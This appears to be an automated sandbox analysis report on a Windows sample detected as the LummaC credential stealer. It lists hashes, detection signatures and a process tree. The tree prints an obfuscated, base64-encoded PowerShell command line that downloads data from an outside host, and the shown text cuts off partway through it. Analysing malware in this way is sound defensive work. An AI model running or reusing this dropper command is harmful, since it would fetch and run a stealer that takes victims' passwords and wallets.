Edit tour
Windows
Analysis Report
b6FArHy7yA.exe
Overview
General Information
Sample name: | b6FArHy7yA.exerenamed because original name is a hash value |
Original sample name: | ae194517d632d9e0644984547d2f6f86c563350eccc501e97b1452a4f4bc089b.exe |
Analysis ID: | 1569162 |
MD5: | 646e2bff8d4d8ad6689f9edbc3f7fd27 |
SHA1: | 96b6ee40793ee39b380433b5b4116e4c4211d3eb |
SHA256: | ae194517d632d9e0644984547d2f6f86c563350eccc501e97b1452a4f4bc089b |
Tags: | exelummauser-adrian__luca |
Infos: | |
Detection
LummaC Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to evade analysis by execution special instruction (VM detection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- b6FArHy7yA.exe (PID: 6936 cmdline:
"C:\Users\ user\Deskt op\b6FArHy 7yA.exe" MD5: 646E2BFF8D4D8AD6689F9EDBC3F7FD27) - powershell.exe (PID: 2444 cmdline:
powershell -exec byp ass -Enc J ABmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAIAA9ACA AewAKACAAI AAgACAAUwB 0AGEAcgB0A C0AUwBsAGU AZQBwACAAL QBTAGUAYwB vAG4AZABzA CAAMwAKAAo AIAAgACAAI ABbAFMAeQB zAHQAZQBtA C4ATgBlAHQ ALgBXAGUAY gBSAGUAcQB 1AGUAcwB0A F0AOgA6AEM AcgBlAGEAd ABlACgAIgB oAHQAdABwA HMAOgAvAC8 AdwB3AHcAL gAzADYAMAA uAG4AZQB0A CIAKQAuAEc AZQB0AFIAZ QBzAHAAbwB uAHMAZQAoA CkALgBDAGw AbwBzAGUAK AApAAoACgA gACAAIAAgA FMAdABhAHI AdAAtAFMAb ABlAGUAcAA gAC0AUwBlA GMAbwBuAGQ AcwAgADEAC gAKACAAIAA gACAAWwBTA HkAcwB0AGU AbQAuAE4AZ QB0AC4AVwB lAGIAUgBlA HEAdQBlAHM AdABdADoAO gBDAHIAZQB hAHQAZQAoA CIAaAB0AHQ AcABzADoAL wAvAHcAdwB 3AC4AYgBhA GkAZAB1AC4 AYwBvAG0AI gApAC4ARwB lAHQAUgBlA HMAcABvAG4 AcwBlACgAK QAuAEMAbAB vAHMAZQAoA CkACgAKACA AIAAgACAAU wB0AGEAcgB 0AC0AUwBsA GUAZQBwACA ALQBTAGUAY wBvAG4AZAB zACAAMQAKA AoAIAAgACA AIAAkAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA CAAPQAgACI AaAB0AHQAc ABzADoALwA vAGsAbABpA HAAZABhAGo AZQBtAHUAY QAwAC4AcwB oAG8AcAAvA GkAbgB0AF8 AYwBsAHAAX wBpAG4AdAB lAHIALgB0A HgAdAAiAAo AIAAgACAAI AAkAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AIAA9ACAAT gBlAHcALQB PAGIAagBlA GMAdAAgAFM AeQBzAHQAZ QBtAC4ATgB lAHQALgBXA GUAYgBDAGw AaQBlAG4Ad AAKACAAIAA gACAAJABmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAIAA 9ACAAJABmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAC4ARAB vAHcAbgBsA G8AYQBkAEQ AYQB0AGEAK AAkAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmACk ACgAKACAAI AAgACAAJAB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gBmAGYAZgB mAGYAZgBmA GYAZgBmAGY AZgBmAGYAZ gAgAD0AIAB OAGUAdwAtA E8AYgBqAGU AYwB0ACAAU wB5AHMAdAB lAG0ALgBJA E8ALgBNAGU AbQBvAHIAe QBTAHQAcgB lAGEAbQAKA CAAIAAgACA AJABmAGYAZ